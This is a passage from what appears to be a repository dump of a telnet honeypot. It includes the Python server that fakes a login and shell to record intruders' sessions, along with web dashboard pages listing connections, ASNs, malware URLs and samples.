there\"\n\tcmds[247] = \"EC   - erase char\"\n\tcmds[248] = \"EL   - erase line\"\n\tcmds[249] = \"GA   - go ahead\"\n\tcmds[250] = \"SB   - subnegotiation\"\n\tcmds[251] = \"WILL - positive return\"\n\tcmds[252] = \"WONT - negative return\"\n\tcmds[253] = \"DO   - set option\"\n\tcmds[254] = \"DONT - unset option\"\n\tcmds[255] = \"IAC  - interpret as command\"\n\n\tSE   = 240\n\tNOP  = 241\n\tDM   = 242\n\tBRK  = 243\n\tIP   = 244\n\tAO   = 245\n\tAYT  = 246\n\tEC   = 247\n\tEL   = 248\n\tGA   = 249\n\tSB   = 250\n\tWILL = 251\n\tWONT = 252\n\tDO   = 253\n\tDONT = 254\n\tIAC  = 255\n\n\t# Options\n\tNAWS = 31\n\n\tdef __init__(self, addr, port):\n\t\tself.host     = addr\n\t\tself.port     = port\n\t\tself.sock     = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.do_run   = True\n\t\tself.ipfilter = IPFilter()\n\n\tdef run(self):\n\t\tself.sock.bind((self.host, self.port))\n\t\tself.sock.listen(10)\n\t\tself.sock.settimeout(None)\n\t\tdbg(\"Socket open on \" + str(self.host) +  \":\" + str(self.port))\n\t\twhile self.do_run:\n\t\t\ttry:\n\t\t\t\tself.handle()\n\t\t\texcept:\n\t\t\t\ttraceback.print_exc()\n\t\tself.sock.close()\n\t\tdbg(\"Socket Closed\")\n\n\tdef handle(self):\n\t\tconn = False\n\t\ttry:\n\t\t\tconn, addr = self.sock.accept()\n\t\t\tdbg(\"Client connected at \" + str(addr))\n\t\t\t\n\t\t\tif self.ipfilter.is_allowed(addr[0]):\n\t\t\t\tself.ipfilter.add_ip(addr[0])\n\t\t\t\tsess = TelnetSess(self, conn, addr)\n\t\t\t\tstart_new_thread(sess.loop, ())\n\t\t\telse:\n\t\t\t\tdbg(\"Connection limit for \" + addr[0] + \" exceeded, closing\")\n\t\t\t\tconn.close()\n\t\texcept:\n\t\t\ttraceback.print_exc()\n\n\tdef stop(self):\n\t\tself.do_run = False\n\nclass TelnetSess:\n\tdef __init__(self, serv, sock, remote):\n\t\tself.serv    = serv\n\t\tself.sock    = sock\n\t\tself.timeout = config.get(\"telnet_session_timeout\")\n\t\tself.maxtime = config.get(\"telnet_max_session_length\")\n\t\tself.db_id   = 0\n\t\tself.remote  = remote\n\t\tself.session = None\n\n\tdef loop(self):\n\t\tself.session = Session(self.send_string, self.remote[0])\n\n\t\tdbg(\"Setting timeout to \" + str(self.timeout) + \" seconds\")\n\t\tself.sock.settimeout(self.timeout)\n\n\t\ttry:\n\t\t\tself.test_opt(1)\n\n\t\t\t# Kill of Session if longer than self.maxtime\n\t\t\tts_start = int(time.time())\n\n\t\t\tself.send_string(\"Login: \")\n\t\t\tu = self.recv_line()\n\t\t\tself.send_string(\"Password: \")\n\t\t\tp = self.recv_line()\n\n\t\t\tself.send_string(\"\\r\\nWelcome to EmbyLinux 3.13.0-24-generic\\r\\n\")\n\n\t\t\tself.session.login(u, p)\n\n\t\t\twhile True:\n\t\t\t\tl = self.recv_line()\n\n\t\t\t\ttry:\n\t\t\t\t\tself.session.shell(l)\n\t\t\t\texcept:\n\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\tself.send_string(\"sh: error\\r\\n\")\n\n\t\t\t\tif ts_start + self.maxtime < int(time.time()):\n\t\t\t\t\tdbg(\"Session too long. Killing off.\")\n\t\t\t\t\tbreak\n\n\t\texcept socket.timeout:\n\t\t\tdbg(\"Connection timed out\")\n\t\texcept EOFError:\n\t\t\tdbg(\"Connection closed\")\n\n\t\tself.session.end()\n\t\tself.sock.close()\n\n\tdef test_naws(self):\n\t\t#dbg(\"TEST NAWS\")\n\t\tif self.test_opt(Telnetd.NAWS):\n\t\t\tself.need(Telnetd.IAC)\n\t\t\tself.need(Telnetd.SB)\n\t\t\tself.need(Telnetd.NAWS)\n\n\t\t\tw = self.recv_short()\n\t\t\th = self.recv_short()\n\n\t\t\tself.need(Telnetd.IAC)\n\t\t\tself.need(Telnetd.SE)\n\n\t\t\t#dbg(\"TEST NAWS OK \" + str(w) + \"x\" + str(h))\n\t\telif byte == Telnetd.WONT:\n\t\t\tpass\n\t\t\t#dgb(\"TEST NAWS FAILED\")\n\t\telse:\n\t\t\traise ValueError()\n\n\tdef test_linemode(self):\n\t\t#dbg(\"TEST LINEMODE\")\n\t\tif self.test_opt(34):\n\t\t\tself.need(Telnetd.IAC)\n\t\t\tself.need(Telnetd.SE)\n\n\tdef test_opt(self, opt, do=True):\n\t\t#dbg(\"TEST \" + str(opt))\n\n\t\tself.send(Telnetd.IAC)\n\t\tif do:\n\t\t\tself.send(Telnetd.DO)\n\t\telse:\n\t\t\tself.send(Telnetd.DONT)\n\t\tself.send(opt)\n\n\tdef send(self, byte):\n\t\t#if byte in Telnetd.cmds:\n\t\t#\tdbg(\"SEND \" + str(Telnetd.cmds[byte]))\n\t\t#else:\n\t\t#\tdbg(\"SEND \" + str(byte))\n\t\tself.sock.send(chr(byte))\n\n\tdef send_string(self, msg):\n\t\tself.sock.send(msg)\n\t\t#dbg(\"SEND STRING LEN\" + str(len(msg)))\n\n\tdef recv(self):\n\t\tbyte = self.sock.recv(1)\n\t\tif len(byte) == 0:\n\t\t\traise EOFError\n\t\tbyte = ord(byte)\n\t\t#if byte in Telnetd.cmds:\n\t\t#\tdbg(\"RECV \" + str(Telnetd.cmds[byte]))\n\t\t#else:\n\t\t#\tdbg(\"RECV \" + str(byte))\n\t\treturn byte\n\n\tdef recv_line(self):\n\t\tline = \"\"\n\t\twhile True:\n\t\t\tbyte = self.recv()\n\t\t\tif byte == Telnetd.IAC:\n\t\t\t\tbyte = self.recv()\n\t\t\t\tself.process_cmd(byte)\n\t\t\telif byte == ord(\"\\r\"):\n\t\t\t\tpass\n\t\t\telif byte == ord(\"\\n\"):\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tline = line + chr(byte)\n\t\t#dbg(\"RECV STRING \" + line)\n\t\treturn line\n\n\tdef recv_short(self):\n\t\tbytes = self.sock.recv(2)\n\t\tshort = struct.unpack(\"!H\", bytes)[0]\n\t\t#dbg(\"RECV SHORT \" + str(short))\n\t\treturn short\n\n\tdef need(self, byte_need):\n\t\tbyte = ord(self.sock.recv(1))\n\t\t#if byte in Telnetd.cmds:\n\t\t#\tdbg(\"RECV \" + str(Telnetd.cmds[byte]))\n\t\t#else:\n\t\t#\tdbg(\"RECV \" + str(byte))\n\t\tif byte != byte_need:\n\t\t\tdbg(\"BAD  \" + \"PROTOCOL ERROR. EXIT.\")\n\t\t\traise ValueError()\n\t\treturn byte\n\n\tdef process_cmd(self, cmd):\n\t\tif cmd == Telnetd.DO:\n\t\t\tbyte = self.recv()\n\t\t\tself.send(Telnetd.IAC)\n\t\t\tself.send(Telnetd.WONT)\n\t\t\tself.send(byte)\n\t\tif cmd == Telnetd.WILL or cmd == Telnetd.WONT:\n\t\t\tbyte = self.recv()\n\n"
  },
  {
    "path": "honeypot.py",
    "content": "import os\nimport sys\nimport signal\nimport json\nimport socket\n\nfrom honeypot.telnet      import Telnetd\nfrom honeypot.client      import Client\nfrom honeypot.session     import Session\nfrom honeypot.shell.shell import test_shell\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nsrv = None\n\ndef import_file(fname):\n\twith open(fname, \"rb\") as fp:\n\t\tclient = Client()\n\t\tfor line in fp:\n\t\t\tline = line.strip()\n\t\t\tobj  = json.loads(line)\n\t\t\tif obj[\"type\"] == \"connection\":\n\t\t\t\tif obj[\"ip\"] != None:\n\t\t\t\t\tprint \"conn   \" + obj[\"ip\"]\n\t\t\t\t\tclient.put_session(obj)\n\t\t\tif obj[\"type\"] == \"sample\":\n\t\t\t\tprint \"sample \" + obj[\"sha256\"]\n\t\t\t\tclient.put_sample_info(obj)\n\t\t\t\t\ndef rerun_file(fname):\n\twith open(fname, \"rb\") as fp:\n\t\tfor line in fp:\n\t\t\tline = line.strip()\n\t\t\tobj  = json.loads(line)\n\t\t\tif obj[\"type\"] == \"connection\":\n\t\t\t\tif obj[\"ip\"] == None: continue\n\t\t\t\tsession = Session(sys.stdout.write, obj[\"ip\"])\n\t\t\t\tsession.login(obj[\"user\"], obj[\"pass\"])\n\t\t\t\tfor event in obj[\"stream\"]:\n\t\t\t\t\tif not(event[\"in\"]): continue\n\t\t\t\t\tsys.stdout.write(event[\"data\"])\t\t\n\t\t\t\t\tsession.shell(event[\"data\"].strip())\n\t\t\t\tsession.end()\n\n\ndef signal_handler(signal, frame):\n\tdbg('Ctrl+C')\n\tsrv.stop()\n\nif not os.path.exists(\"samples\"):\n\tos.makedirs(\"samples\")\n\nif __name__ == \"__main__\":\n\taction = None\n\tconfigFile = None\n\n\ti = 0\n\twhile i+1 < len(sys.argv):\n\t\ti += 1\t\t\n\t\targ = sys.argv[i]\n\t\t\n\t\tif arg == \"-c\":\n\t\t\tif i+1 < len(sys.argv):\n\t\t\t\tconfigFile = sys.argv[i+1]\n\t\t\t\tprint \"Using config file \" + configFile\n\t\t\t\ti += 1\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint \"warning: expected argument after \\\"-c\\\"\"\n\t\telse:\n\t\t\taction = arg\n\t\t\t\n\tif configFile:\n\t\tconfig.loadUserConfig(configFile)\n\t\n\tif action == None:\n\t\tsocket.setdefaulttimeout(15)\n\t\t\n\t\tsrv = Telnetd(config.get(\"telnet_addr\"), config.get(\"telnet_port\"))\n\t\tsignal.signal(signal.SIGINT, signal_handler)\n\t\tsrv.run()\n\telif action == \"import\":\n\t\tfname = sys.argv[2]\n\t\timport_file(fname)\n\telif action == \"rerun\":\n\t\tfname = sys.argv[2]\n\t\trerun_file(fname)\n\telif action == \"shell\":\n\t\ttest_shell()\n\telse:\n\t\tprint \"Command \" + action + \" unknown.\"\n\n"
  },
  {
    "path": "html/.gitignore",
    "content": "db.php\napiurl.js\n"
  },
  {
    "path": "html/admin.html",
    "content": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<div class=\"page-header\">\n\t<h1>Administration Area</h1>\n</div>\n\n<div class=\"alert alert-info\" role=\"alert\" ng-show=\"errormsg\">{{ errormsg }}</div>\n<div ng-show=\"!loggedin\">\n  <h2>Login</h2>\n  <form>\n    <div class=\"form-group\">\n      <label for=\"username\">Username</label>\n      <input type=\"text\" class=\"form-control\" ng-model=\"username\" placeholder=\"Username\" id=\"username\">\n    </div>\n    <div class=\"form-group\">\n      <label for=\"password\">Password</label>\n      <input type=\"password\" class=\"form-control\" ng-model=\"password\" placeholder=\"Password\" id=\"password\">\n    </div>\n    <button type=\"submit\" class=\"btn btn-default\" ng-click=\"login()\">Login</button>\n  </form>\n</div>\n\n<div ng-show=\"loggedin\">\n  <h2>Add a new user</h2>\n  <form>\n    <div class=\"form-group\">\n      <label for=\"new_username\">New users name</label>\n      <input type=\"text\" class=\"form-control\" ng-model=\"new_username\" placeholder=\"Username\" id=\"new_username\">\n    </div>\n    <div class=\"form-group\">\n      <label for=\"new_password\">New users password</label>\n      <input type=\"password\" class=\"form-control\" ng-model=\"new_password\" placeholder=\"Password\" id=\"new_password\">\n    </div>\n    <button type=\"submit\" class=\"btn btn-default\" ng-click=\"addUser()\">Add User</button>\n  </form>\n  <hr>\n  <form>\n    <button type=\"submit\" class=\"btn btn-default btn-danger\" ng-click=\"logout()\">Logout</button>\n  </form>\n</div>\n\n"
  },
  {
    "path": "html/asn.html",
    "content": "<h1>ASN Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td><b>{{ asn.name }}</b></td></tr>\n\t<tr><td>Country</td><td><img src=\"img/flags/{{ asn.country.toLowerCase() }}.png\"> {{ asn.countryname }}</td></tr>\n\t<tr><td>ASN</td><td>AS{{ asn.asn }}</td></tr>\n\t<tr><td>Internet Registry</td><td>{{ REGISTRIES[asn.reg] }}</td></tr>\n\t<tr><td>More Info</td><td><a href=\"http://bgp.he.net/AS{{ asn.asn }}\" target=\"_blank\"><span class=\"glyphicon glyphicon-link\"></span> AS{{ asn.asn }} on bgp.he.net</a></td></tr>\n\n</table>\n\n<h2>Connections from AS{{ asn.asn }} <small><a href=\"#/connections?asn_id={{ asn.asn }}\">more</a></small></h2>\n\n<div ng-include=\"'connectionlist-embed.html'\"></div>\n\n<h2>URLs located in AS{{ asn.asn }}</h2>\n\n<table class=\"table\">\n\n\t<tr><th>Connections</th><th>Url</th><th>Sample</th></tr>\n\t<tr ng-repeat=\"url in asn.urls\"><td>{{ url.connections }}</td><td>{{ url.url }}</td><td>{{ url.sample }}</td></tr>\n\n</table>\n\n<small>Coming soon</small>\n"
  },
  {
    "path": "html/common.js",
    "content": "\nvar fakenames = [\"Boar\",\"Stallion\",\"Yak\",\"Beaver\",\"Salamander\",\"Eagle Owl\",\"Impala\",\"Elephant\",\"Chameleon\",\"Argali\",\"Lemur\",\"Addax\",\"Colt\",\"Whale\",\"Dormouse\",\"Budgerigar\",\"Dugong\",\"Squirrel\",\"Okapi\",\"Burro\",\"Fish\",\"Crocodile\",\"Finch\",\"Bison\",\"Gazelle\",\"Basilisk\",\"Puma\",\"Rooster\",\"Moose\",\"Musk Deer\",\"Thorny Devil\",\"Gopher\",\"Gnu\",\"Panther\",\"Porpoise\",\"Lamb\",\"Parakeet\",\"Marmoset\",\"Coati\",\"Alligator\",\"Elk\",\"Antelope\",\"Kitten\",\"Capybara\",\"Mule\",\"Mouse\",\"Civet\",\"Zebu\",\"Horse\",\"Bald Eagle\",\"Raccoon\",\"Pronghorn\",\"Parrot\",\"Llama\",\"Tapir\",\"Duckbill Platypus\",\"Cow\",\"Ewe\",\"Bighorn\",\"Hedgehog\",\"Crow\",\"Mustang\",\"Panda\",\"Otter\",\"Mare\",\"Goat\",\"Dingo\",\"Hog\",\"Mongoose\",\"Guanaco\",\"Walrus\",\"Springbok\",\"Dog\",\"Kangaroo\",\"Badger\",\"Fawn\",\"Octopus\",\"Buffalo\",\"Doe\",\"Camel\",\"Shrew\",\"Lovebird\",\"Gemsbok\",\"Mink\",\"Lynx\",\"Wolverine\",\"Fox\",\"Gorilla\",\"Silver Fox\",\"Wolf\",\"Ground Hog\",\"Meerkat\",\"Pony\",\"Highland Cow\",\"Mynah Bird\",\"Giraffe\",\"Cougar\",\"Eland\",\"Ferret\",\"Rhinoceros\"];\n\nfunction extractHash() {\n\tvar table  = {};\n\tvar values = window.location.hash.substr(1);\n\tvalues = values.split(\"&\");\n\tfor (var i = 0; i < values.length; i++) {\n\t\tvar tuple = values[i].split(\"=\");\n\t\tvar name  = tuple[0];\n\t\tvar value = tuple.length > 1 ? tuple[1] : null;\n\t\ttable[name] = value;\n\t}\n\treturn table;\n}\n\nfunction formatDate(date) {\n\td = new Date(date * 1000);\n\treturn d.toTimeString().replace(/.*(\\d{2}:\\d{2}:\\d{2}).*/, \"$1\");\n}\n\nvar months = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Okt\", \"Nov\", \"Dez\"];\n\nfunction formatDay(date) {\n\td = new Date(date * 1000);\n\treturn d.getDate() + \" \" + months[d.getMonth()];\n}\n\nfunction formatDateTime(date) {\n\tif (date == null) return \"\";\n\td = new Date(date * 1000);\n\treturn d.getDate() + \".\" + (d.getMonth()+1) + \" \" + d.toTimeString().replace(/.*(\\d{2}:\\d{2}):\\d{2}.*/, \"$1\");\n}\n\nfunction time() {\n\treturn Math.round(new Date().getTime() / 1000);\n}\n\nfunction nicenull (str, el) {\n\tif (str == null || str == \"\")\n\t\treturn el;\n\telse\n\t\treturn str;\n}\n\nfunction short (str, l) {\n\tif (str)\n\t\treturn str.substring(0, l) + \"...\";\n\telse\n\t\treturn \"None\";\n}\n\nfunction encurl(url) {\n\treturn btoa(url);\n}\n\nfunction decurl(url) {\n\treturn atob(url);\n}\n"
  },
  {
    "path": "html/connection.html",
    "content": "<h1>Connection Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Date</td><td>{{ formatDate(connection.date) }}</td></tr>\n\t<tr><td>Duration</td><td>{{ connection.duration }} seconds</td></tr>\n\t<tr><td>Network / Malware</td><td>\n\t\t<a href=\"#/network/{{ connection.network.id }}\">#{{ connection.network.id }}</a>\n\t\t<span> / </span>\n\t\t<a href=\"#/malware/{{ connection.network.malware.id }}\">{{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }}</a>\n\t</td></tr>\n\t<!-- <tr><td>ID</td><td>{{ connection.id }}</td></tr> -->\n\t<tr><td>Honeypot name</td><td>{{ connection.backend_user }}</td></tr>\n\t<tr>\n\t\t<td>IP</td>\n\t\t<td>\n\t\t\t<span ng-show=\"connection.asn\"><a href=\"#/connections?country={{ connection.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a> <img src=\"img/flags/{{ connection.country.toLowerCase() }}.png\"> {{ connection.city + ', ' + connection.countryname }} <a target=\"_blank\" href=\"http://www.openstreetmap.org/?zoom=13&lat={{ connection.latitude }}&lon={{ connection.longitude }}\">map</a> <br></span>\n\t\t\t<span><a href=\"#/connections?ip={{ connection.ip }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></span> {{ connection.ip }}<br>\n\t\t\t<span ng-show=\"connection.asn\"><a href=\"#/asn/{{ connection.asn.asn }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a> AS{{ connection.asn.asn }} <b>{{ connection.asn.name }}</b>\n\t\t\t</span><br>\n\t\t\t<span ng-show=\"connection.asn\">{{ connection.ipblock }}</span>\n\t\t</td>\n\t</tr>\n\t<tr><td>User : Password</td><td><a href=\"#/connections?user={{ connection.user }}\"><span class=\"glyphicon glyphicon-screenshot\"></span> \"{{ connection.user }}\"</a> : <a href=\"#/connections?password={{ connection.password }}\">\"{{ connection.password }}\" <span class=\"glyphicon glyphicon-screenshot\"></span></a></td></tr>\n\t<tr ng-show=\"connection.conns_before.length > 0\">\n\t\t<td>Prior Connections</td>\n\t\t<td>\n\t\t\t<p ng-repeat=\"associate in connection.conns_before\">\n\t\t\t\t<a href=\"{{ '#/connection/' + associate.id }}\">{{ formatDate(associate.date) }}</a> from \n\t\t\t\t<img src=\"img/flags/{{ associate.country.toLowerCase() }}.png\"> {{ associate.ip }}\n\t\t\t</p>\n\t\t</td>\n\t</tr>\n    <tr ng-show=\"connection.conns_after.length > 0\">\n\t\t<td>Subsequent Connections</td>\n\t\t<td>\n\t\t\t<p ng-repeat=\"associate in connection.conns_after\">\n\t\t\t\t<a href=\"{{ '#/connection/' + associate.id }}\">{{ formatDate(associate.date) }}</a> from \n\t\t\t\t<img src=\"img/flags/{{ associate.country.toLowerCase() }}.png\"> {{ associate.ip }}\n\t\t\t</p>\n\t\t</td>\n\t</tr>\n    <tr ng-show=\"connection.tags.length > 0\">\n\t\t<td>Tags</td>\n\t\t<td>\n            <a class=\"btn btn-default btn-xs\" ng-repeat=\"tag in connection.tags\" style=\"margin-right: 1em;\" href=\"#/tag/{{ tag.name }}\" data-toggle=\"tooltip\" title=\"{{ tag.code }}\">{{ tag.name }}</a>\n\t\t</td>\n\t</tr>\n    \n\n</table>\n\n<div ng-show=\"connection.urls.length > 0\">\n\t<h2>URLs gathered</h2>\n\n\t<table class=\"table\">\n\n\t\t<tr>\n\t\t\t<th>Url</th>\n\t\t\t<th>First Seen</th>\n\t\t\t<th>Sample</th>\n\t\t</tr>\n\t\t<tr ng-repeat=\"url in connection.urls\">\n\t\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t\t<td><a href=\"{{ '#/sample/' + url.sample }}\">{{ short(url.sample, 16) }}</a></td>\n\t\t</tr>\n\n\t</table>\n</div>\n\n<div ng-show=\"connection.text_combined != ''\">\n\t<h2>Session text <small> show output <input type=\"checkbox\" ng-model=\"displayoutput\"></small></h2>\n\n\t<div class=\"well well-sm code\">\n\t\t<div style=\"font-size: 0.7em;\">Session Text does not include non-ascii characters</div>\n\t\t<span class=\"code-line\" ng-show=\"displayoutput || event.in\" ng-class=\"{ isinput: event.in }\" ng-repeat=\"event in connection.stream\" title=\"after {{ event.ts }} s\">{{ event.data }}</span>\n\t</div>\n</div>\n"
  },
  {
    "path": "html/connectionlist-embed.html",
    "content": "<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Date</th>\n\t\t<th ng-show=\"!filter['ip']\">IP</th>\n\t\t<th ng-show=\"!filter['asn_id']\">ASN</th>\n\t\t<th ng-show=\"!filter['country']\">Country</th>\n\t\t<th>Username</th>\n\t\t<th>Password</th>\n\t\t<th>N⁰ Urls</th>\n\t</tr>\n\t<tr ng-repeat=\"connection in connections\">\n\t\t<td><a href=\"{{ '#/connection/' + connection.id }}\">{{ formatDate(connection.date) }}</a></td>\n\t\t<td ng-show=\"!filter['ip']\"> {{ connection.ip }} <a href=\"#/connections?ip={{ connection.ip }}\"><span class=\"glyphicon glyphicon-screenshot\"></a></td>\n\t\t<td ng-show=\"!filter['asn_id']\">{{ connection.asn.asn }} <a href=\"#/asn/{{ connection.asn.asn }}\"><span class=\"glyphicon glyphicon-screenshot\"></a></td>\n\t\t<td ng-show=\"!filter['country']\"><img src=\"img/flags/{{ connection.country.toLowerCase() }}.png\">  {{ connection.country }} <a href=\"#/connections?country={{ connection.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td>{{ connection.user }} <a href=\"#/connections?user={{ connection.user }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td>{{ connection.password }} <a href=\"#/connections?password={{ connection.password }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></td>\n\t\t<td>{{ connection.urls }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/connectionlist.html",
    "content": "<h2>Connections</h2>\n\n<div class=\"well well-sm\" style=\"font-family: monospace\">\n\t<div style=\"font-size: 0.7em;\">\n\t\tFilters:\n\t\t<button style=\"background:none; border:none; margin:0; padding:0;\" type=\"button\" data-toggle=\"collapse\" data-target=\"#collapseExample\" aria-expanded=\"false\" aria-controls=\"collapseExample\">\n\t\t\t<span class=\"glyphicon glyphicon-info-sign\"></span>\n\t\t</button>\n\t\t<div class=\"collapse\" id=\"collapseExample\">\n\t\t\t<p>You may use the url bar to edit filters</p>\n\t\t\t<p>Available arguments: [\"ipblock\", \"user\", \"password\", \"ip\", \"country\", \"asn_id\"]</p>\n\t\t</div>\n\t</div>\n\t<span ng-repeat=\"(k, v) in filter\">{{ k }} == <img ng-show=\"k == 'country'\" src=\"img/flags/{{ v.toLowerCase() }}.png\"> {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }}</span>\n</div>\n\n<div ng-include=\"'connectionlist-embed.html'\"></div>\n\n<div class=\"pull-right\">\n\t<button type=\"button\" class=\"btn btn-default\" ng-click=\"nextpage()\">More &raquo;</button>\n</div>"
  },
  {
    "path": "html/countries.js",
    "content": "var COUNTRY_LIST = {\"AF\":\"Afghanistan\",\"AX\":\"Åland Islands\",\"AL\":\"Albania\",\"DZ\":\"Algeria\",\"AS\":\"American Samoa\",\"AD\":\"AndorrA\",\"AO\":\"Angola\",\"AI\":\"Anguilla\",\"AQ\":\"Antarctica\",\"AG\":\"Antigua and Barbuda\",\"AR\":\"Argentina\",\"AM\":\"Armenia\",\"AW\":\"Aruba\",\"AU\":\"Australia\",\"AT\":\"Austria\",\"AZ\":\"Azerbaijan\",\"BS\":\"Bahamas\",\"BH\":\"Bahrain\",\"BD\":\"Bangladesh\",\"BB\":\"Barbados\",\"BY\":\"Belarus\",\"BE\":\"Belgium\",\"BZ\":\"Belize\",\"BJ\":\"Benin\",\"BM\":\"Bermuda\",\"BT\":\"Bhutan\",\"BO\":\"Bolivia\",\"BA\":\"Bosnia and Herzegovina\",\"BW\":\"Botswana\",\"BV\":\"Bouvet Island\",\"BR\":\"Brazil\",\"IO\":\"British Indian Ocean Territory\",\"BN\":\"Brunei Darussalam\",\"BG\":\"Bulgaria\",\"BF\":\"Burkina Faso\",\"BI\":\"Burundi\",\"KH\":\"Cambodia\",\"CM\":\"Cameroon\",\"CA\":\"Canada\",\"CV\":\"Cape Verde\",\"KY\":\"Cayman Islands\",\"CF\":\"Central African Republic\",\"TD\":\"Chad\",\"CL\":\"Chile\",\"CN\":\"China\",\"CX\":\"Christmas Island\",\"CC\":\"Cocos (Keeling) Islands\",\"CO\":\"Colombia\",\"KM\":\"Comoros\",\"CG\":\"Congo\",\"CD\":\"Congo, The Democratic Republic of the\",\"CK\":\"Cook Islands\",\"CR\":\"Costa Rica\",\"CI\":\"Cote D'Ivoire\",\"HR\":\"Croatia\",\"CU\":\"Cuba\",\"CY\":\"Cyprus\",\"CZ\":\"Czech Republic\",\"DK\":\"Denmark\",\"DJ\":\"Djibouti\",\"DM\":\"Dominica\",\"DO\":\"Dominican Republic\",\"EC\":\"Ecuador\",\"EG\":\"Egypt\",\"SV\":\"El Salvador\",\"GQ\":\"Equatorial Guinea\",\"ER\":\"Eritrea\",\"EE\":\"Estonia\",\"ET\":\"Ethiopia\",\"FK\":\"Falkland Islands (Malvinas)\",\"FO\":\"Faroe Islands\",\"FJ\":\"Fiji\",\"FI\":\"Finland\",\"FR\":\"France\",\"GF\":\"French Guiana\",\"PF\":\"French Polynesia\",\"TF\":\"French Southern Territories\",\"GA\":\"Gabon\",\"GM\":\"Gambia\",\"GE\":\"Georgia\",\"DE\":\"Germany\",\"GH\":\"Ghana\",\"GI\":\"Gibraltar\",\"GR\":\"Greece\",\"GL\":\"Greenland\",\"GD\":\"Grenada\",\"GP\":\"Guadeloupe\",\"GU\":\"Guam\",\"GT\":\"Guatemala\",\"GG\":\"Guernsey\",\"GN\":\"Guinea\",\"GW\":\"Guinea-Bissau\",\"GY\":\"Guyana\",\"HT\":\"Haiti\",\"HM\":\"Heard Island and Mcdonald Islands\",\"VA\":\"Holy See (Vatican City State)\",\"HN\":\"Honduras\",\"HK\":\"Hong Kong\",\"HU\":\"Hungary\",\"IS\":\"Iceland\",\"IN\":\"India\",\"ID\":\"Indonesia\",\"IR\":\"Iran, Islamic Republic Of\",\"IQ\":\"Iraq\",\"IE\":\"Ireland\",\"IM\":\"Isle of Man\",\"IL\":\"Israel\",\"IT\":\"Italy\",\"JM\":\"Jamaica\",\"JP\":\"Japan\",\"JE\":\"Jersey\",\"JO\":\"Jordan\",\"KZ\":\"Kazakhstan\",\"KE\":\"Kenya\",\"KI\":\"Kiribati\",\"KP\":\"Korea, Democratic People'S Republic of\",\"KR\":\"Korea, Republic of\",\"KW\":\"Kuwait\",\"KG\":\"Kyrgyzstan\",\"LA\":\"Lao People'S Democratic Republic\",\"LV\":\"Latvia\",\"LB\":\"Lebanon\",\"LS\":\"Lesotho\",\"LR\":\"Liberia\",\"LY\":\"Libyan Arab Jamahiriya\",\"LI\":\"Liechtenstein\",\"LT\":\"Lithuania\",\"LU\":\"Luxembourg\",\"MO\":\"Macao\",\"MK\":\"Macedonia, The Former Yugoslav Republic of\",\"MG\":\"Madagascar\",\"MW\":\"Malawi\",\"MY\":\"Malaysia\",\"MV\":\"Maldives\",\"ML\":\"Mali\",\"MT\":\"Malta\",\"MH\":\"Marshall Islands\",\"MQ\":\"Martinique\",\"MR\":\"Mauritania\",\"MU\":\"Mauritius\",\"YT\":\"Mayotte\",\"MX\":\"Mexico\",\"FM\":\"Micronesia, Federated States of\",\"MD\":\"Moldova, Republic of\",\"MC\":\"Monaco\",\"MN\":\"Mongolia\",\"MS\":\"Montserrat\",\"MA\":\"Morocco\",\"MZ\":\"Mozambique\",\"MM\":\"Myanmar\",\"NA\":\"Namibia\",\"NR\":\"Nauru\",\"NP\":\"Nepal\",\"NL\":\"Netherlands\",\"AN\":\"Netherlands Antilles\",\"NC\":\"New Caledonia\",\"NZ\":\"New Zealand\",\"NI\":\"Nicaragua\",\"NE\":\"Niger\",\"NG\":\"Nigeria\",\"NU\":\"Niue\",\"NF\":\"Norfolk Island\",\"MP\":\"Northern Mariana Islands\",\"NO\":\"Norway\",\"OM\":\"Oman\",\"PK\":\"Pakistan\",\"PW\":\"Palau\",\"PS\":\"Palestinian Territory, Occupied\",\"PA\":\"Panama\",\"PG\":\"Papua New Guinea\",\"PY\":\"Paraguay\",\"PE\":\"Peru\",\"PH\":\"Philippines\",\"PN\":\"Pitcairn\",\"PL\":\"Poland\",\"PT\":\"Portugal\",\"PR\":\"Puerto Rico\",\"QA\":\"Qatar\",\"RE\":\"Reunion\",\"RO\":\"Romania\",\"RU\":\"Russian Federation\",\"RW\":\"RWANDA\",\"SH\":\"Saint Helena\",\"KN\":\"Saint Kitts and Nevis\",\"LC\":\"Saint Lucia\",\"PM\":\"Saint Pierre and Miquelon\",\"VC\":\"Saint Vincent and the Grenadines\",\"WS\":\"Samoa\",\"SM\":\"San Marino\",\"ST\":\"Sao Tome and Principe\",\"SA\":\"Saudi Arabia\",\"SN\":\"Senegal\",\"CS\":\"Serbia and Montenegro\",\"SC\":\"Seychelles\",\"SL\":\"Sierra Leone\",\"SG\":\"Singapore\",\"SK\":\"Slovakia\",\"SI\":\"Slovenia\",\"SB\":\"Solomon Islands\",\"SO\":\"Somalia\",\"ZA\":\"South Africa\",\"GS\":\"South Georgia and the South Sandwich Islands\",\"ES\":\"Spain\",\"LK\":\"Sri Lanka\",\"SD\":\"Sudan\",\"SR\":\"Suriname\",\"SJ\":\"Svalbard and Jan Mayen\",\"SZ\":\"Swaziland\",\"SE\":\"Sweden\",\"CH\":\"Switzerland\",\"SY\":\"Syrian 